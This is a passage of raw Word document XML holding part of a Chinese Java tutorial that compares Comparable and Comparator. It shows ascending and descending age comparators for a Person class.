          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">e) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对比</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>我们定义了两个比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> AscAgeComparator </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> DescAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，来分别对</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>升序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>降低</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>e.1) AscAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它是将</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>按照</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行升序排序。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> * @desc AscAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *       </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>它是</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的升序比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>private static class AscAgeComparator implements Comparator&lt;Person&gt; {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    public int compare(Person p1, Person p2) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        return p1.getAge() - p2.getAge();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>e.2) DescAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它是将</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>按照</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行降序排序。代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> * @desc DescAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
